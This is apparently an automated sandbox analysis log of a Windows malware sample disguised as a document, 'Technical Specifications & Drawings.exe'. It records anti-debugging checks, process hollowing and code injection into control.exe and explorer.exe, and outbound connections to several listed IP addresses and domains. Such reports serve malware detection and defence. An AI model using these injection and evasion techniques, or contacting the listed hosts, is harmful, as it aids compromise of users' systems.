Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01862D82 mov eax, dword ptr fs:[00000030h] 4_2_01862D82
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CC577 mov eax, dword ptr fs:[00000030h] 4_2_017CC577
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CC577 mov eax, dword ptr fs:[00000030h] 4_2_017CC577
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_018705AC mov eax, dword ptr fs:[00000030h] 4_2_018705AC
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_018705AC mov eax, dword ptr fs:[00000030h] 4_2_018705AC
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017C7D50 mov eax, dword ptr fs:[00000030h] 4_2_017C7D50
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E3D43 mov eax, dword ptr fs:[00000030h] 4_2_017E3D43
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D4D3B mov eax, dword ptr fs:[00000030h] 4_2_017D4D3B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D4D3B mov eax, dword ptr fs:[00000030h] 4_2_017D4D3B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D4D3B mov eax, dword ptr fs:[00000030h] 4_2_017D4D3B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017AAD30 mov eax, dword ptr fs:[00000030h] 4_2_017AAD30
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h] 4_2_01826DC9
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h] 4_2_01826DC9
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h] 4_2_01826DC9
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01826DC9 mov ecx, dword ptr fs:[00000030h] 4_2_01826DC9
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h] 4_2_01826DC9
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01826DC9 mov eax, dword ptr fs:[00000030h] 4_2_01826DC9
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B3D34 mov eax, dword ptr fs:[00000030h] 4_2_017B3D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0186FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0186FDE2
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0186FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0186FDE2
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0186FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0186FDE2
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0186FDE2 mov eax, dword ptr fs:[00000030h] 4_2_0186FDE2
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01858DF1 mov eax, dword ptr fs:[00000030h] 4_2_01858DF1
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017BD5E0 mov eax, dword ptr fs:[00000030h] 4_2_017BD5E0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017BD5E0 mov eax, dword ptr fs:[00000030h] 4_2_017BD5E0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01878D34 mov eax, dword ptr fs:[00000030h] 4_2_01878D34
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0182A537 mov eax, dword ptr fs:[00000030h] 4_2_0182A537
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0186E539 mov eax, dword ptr fs:[00000030h] 4_2_0186E539
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01823540 mov eax, dword ptr fs:[00000030h] 4_2_01823540
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01853D40 mov eax, dword ptr fs:[00000030h] 4_2_01853D40
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D1DB5 mov eax, dword ptr fs:[00000030h] 4_2_017D1DB5
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D1DB5 mov eax, dword ptr fs:[00000030h] 4_2_017D1DB5
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D1DB5 mov eax, dword ptr fs:[00000030h] 4_2_017D1DB5
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D35A1 mov eax, dword ptr fs:[00000030h] 4_2_017D35A1
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DFD9B mov eax, dword ptr fs:[00000030h] 4_2_017DFD9B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DFD9B mov eax, dword ptr fs:[00000030h] 4_2_017DFD9B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h] 4_2_017A2D8A
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h] 4_2_017A2D8A
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h] 4_2_017A2D8A
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h] 4_2_017A2D8A
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A2D8A mov eax, dword ptr fs:[00000030h] 4_2_017A2D8A
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D2581 mov eax, dword ptr fs:[00000030h] 4_2_017D2581
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D2581 mov eax, dword ptr fs:[00000030h] 4_2_017D2581
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D2581 mov eax, dword ptr fs:[00000030h] 4_2_017D2581
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D2581 mov eax, dword ptr fs:[00000030h] 4_2_017D2581
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h] 4_2_017DAC7B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h] 4_2_017DAC7B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h] 4_2_017DAC7B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h] 4_2_017DAC7B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h] 4_2_017DAC7B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h] 4_2_017DAC7B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h] 4_2_017DAC7B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h] 4_2_017DAC7B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h] 4_2_017DAC7B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h] 4_2_017DAC7B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DAC7B mov eax, dword ptr fs:[00000030h] 4_2_017DAC7B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864496 mov eax, dword ptr fs:[00000030h] 4_2_01864496
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017C746D mov eax, dword ptr fs:[00000030h] 4_2_017C746D
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DA44B mov eax, dword ptr fs:[00000030h] 4_2_017DA44B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01878CD6 mov eax, dword ptr fs:[00000030h] 4_2_01878CD6
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DBC2C mov eax, dword ptr fs:[00000030h] 4_2_017DBC2C
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01826CF0 mov eax, dword ptr fs:[00000030h] 4_2_01826CF0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01826CF0 mov eax, dword ptr fs:[00000030h] 4_2_01826CF0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01826CF0 mov eax, dword ptr fs:[00000030h] 4_2_01826CF0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_018614FB mov eax, dword ptr fs:[00000030h] 4_2_018614FB
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h] 4_2_01861C06
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h] 4_2_01861C06
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h] 4_2_01861C06
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h] 4_2_01861C06
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h] 4_2_01861C06
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h] 4_2_01861C06
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h] 4_2_01861C06
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h] 4_2_01861C06
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h] 4_2_01861C06
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h] 4_2_01861C06
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h] 4_2_01861C06
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h] 4_2_01861C06
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h] 4_2_01861C06
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01861C06 mov eax, dword ptr fs:[00000030h] 4_2_01861C06
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01826C0A mov eax, dword ptr fs:[00000030h] 4_2_01826C0A
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01826C0A mov eax, dword ptr fs:[00000030h] 4_2_01826C0A
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01826C0A mov eax, dword ptr fs:[00000030h] 4_2_01826C0A
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01826C0A mov eax, dword ptr fs:[00000030h] 4_2_01826C0A
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0187740D mov eax, dword ptr fs:[00000030h] 4_2_0187740D
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0187740D mov eax, dword ptr fs:[00000030h] 4_2_0187740D
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0187740D mov eax, dword ptr fs:[00000030h] 4_2_0187740D
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0183C450 mov eax, dword ptr fs:[00000030h] 4_2_0183C450
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0183C450 mov eax, dword ptr fs:[00000030h] 4_2_0183C450
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B849B mov eax, dword ptr fs:[00000030h] 4_2_017B849B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01827794 mov eax, dword ptr fs:[00000030h] 4_2_01827794
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01827794 mov eax, dword ptr fs:[00000030h] 4_2_01827794
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01827794 mov eax, dword ptr fs:[00000030h] 4_2_01827794
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017BFF60 mov eax, dword ptr fs:[00000030h] 4_2_017BFF60
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017BEF40 mov eax, dword ptr fs:[00000030h] 4_2_017BEF40
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CB73D mov eax, dword ptr fs:[00000030h] 4_2_017CB73D
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CB73D mov eax, dword ptr fs:[00000030h] 4_2_017CB73D
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DE730 mov eax, dword ptr fs:[00000030h] 4_2_017DE730
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A4F2E mov eax, dword ptr fs:[00000030h] 4_2_017A4F2E
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A4F2E mov eax, dword ptr fs:[00000030h] 4_2_017A4F2E
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CF716 mov eax, dword ptr fs:[00000030h] 4_2_017CF716
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DA70E mov eax, dword ptr fs:[00000030h] 4_2_017DA70E
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DA70E mov eax, dword ptr fs:[00000030h] 4_2_017DA70E
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0187070D mov eax, dword ptr fs:[00000030h] 4_2_0187070D
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0187070D mov eax, dword ptr fs:[00000030h] 4_2_0187070D
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E37F5 mov eax, dword ptr fs:[00000030h] 4_2_017E37F5
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0183FF10 mov eax, dword ptr fs:[00000030h] 4_2_0183FF10
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0183FF10 mov eax, dword ptr fs:[00000030h] 4_2_0183FF10
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01878F6A mov eax, dword ptr fs:[00000030h] 4_2_01878F6A
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B8794 mov eax, dword ptr fs:[00000030h] 4_2_017B8794
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0183FE87 mov eax, dword ptr fs:[00000030h] 4_2_0183FE87
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CAE73 mov eax, dword ptr fs:[00000030h] 4_2_017CAE73
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CAE73 mov eax, dword ptr fs:[00000030h] 4_2_017CAE73
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CAE73 mov eax, dword ptr fs:[00000030h] 4_2_017CAE73
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CAE73 mov eax, dword ptr fs:[00000030h] 4_2_017CAE73
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CAE73 mov eax, dword ptr fs:[00000030h] 4_2_017CAE73
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B766D mov eax, dword ptr fs:[00000030h] 4_2_017B766D
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01870EA5 mov eax, dword ptr fs:[00000030h] 4_2_01870EA5
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01870EA5 mov eax, dword ptr fs:[00000030h] 4_2_01870EA5
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01870EA5 mov eax, dword ptr fs:[00000030h] 4_2_01870EA5
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_018246A7 mov eax, dword ptr fs:[00000030h] 4_2_018246A7
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B7E41 mov eax, dword ptr fs:[00000030h] 4_2_017B7E41
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B7E41 mov eax, dword ptr fs:[00000030h] 4_2_017B7E41
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B7E41 mov eax, dword ptr fs:[00000030h] 4_2_017B7E41
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B7E41 mov eax, dword ptr fs:[00000030h] 4_2_017B7E41
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B7E41 mov eax, dword ptr fs:[00000030h] 4_2_017B7E41
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B7E41 mov eax, dword ptr fs:[00000030h] 4_2_017B7E41
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0185FEC0 mov eax, dword ptr fs:[00000030h] 4_2_0185FEC0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01878ED6 mov eax, dword ptr fs:[00000030h] 4_2_01878ED6
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017AE620 mov eax, dword ptr fs:[00000030h] 4_2_017AE620
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DA61C mov eax, dword ptr fs:[00000030h] 4_2_017DA61C
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DA61C mov eax, dword ptr fs:[00000030h] 4_2_017DA61C
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017AC600 mov eax, dword ptr fs:[00000030h] 4_2_017AC600
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017AC600 mov eax, dword ptr fs:[00000030h] 4_2_017AC600
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017AC600 mov eax, dword ptr fs:[00000030h] 4_2_017AC600
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D8E00 mov eax, dword ptr fs:[00000030h] 4_2_017D8E00
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01861608 mov eax, dword ptr fs:[00000030h] 4_2_01861608
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B76E2 mov eax, dword ptr fs:[00000030h] 4_2_017B76E2
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D16E0 mov ecx, dword ptr fs:[00000030h] 4_2_017D16E0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D36CC mov eax, dword ptr fs:[00000030h] 4_2_017D36CC
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E8EC7 mov eax, dword ptr fs:[00000030h] 4_2_017E8EC7
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0185FE3F mov eax, dword ptr fs:[00000030h] 4_2_0185FE3F
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0186AE44 mov eax, dword ptr fs:[00000030h] 4_2_0186AE44
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0186AE44 mov eax, dword ptr fs:[00000030h] 4_2_0186AE44
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 4_2_017E9910
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 109.234.162.62 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.mexc-event-partner.site
Source: C:\Windows\explorer.exe Domain query: www.gzkanglongkeji.com
Source: C:\Windows\explorer.exe Network Connect: 107.155.208.43 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 184.168.107.80 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 67.23.226.119 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.kirchhoff-darryl.com
Source: C:\Windows\explorer.exe Network Connect: 67.223.117.72 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.boshi-eg.online
Source: C:\Windows\explorer.exe Domain query: www.tomoptique.fr
Source: C:\Windows\explorer.exe Domain query: www.esandcraic.com
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: 1C0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Memory written: C:\Users\user\Desktop\Technical Specifications & Drawings.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Thread register set: target process: 3968 Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3968 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process created: C:\Users\user\Desktop\Technical Specifications & Drawings.exe C:\Users\user\Desktop\Technical Specifications & Drawings.exe Jump to behavior
Source: explorer.exe, 00000005.00000000.320653170.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.265661607.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.365897983.0000000000688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanEXE^
Source: explorer.exe, 00000005.00000000.329795271.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.302606541.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.321297166.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.321297166.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.366589864.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.298681705.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.321297166.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.366589864.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.298681705.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.297954102.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.365954080.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.265765381.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd4
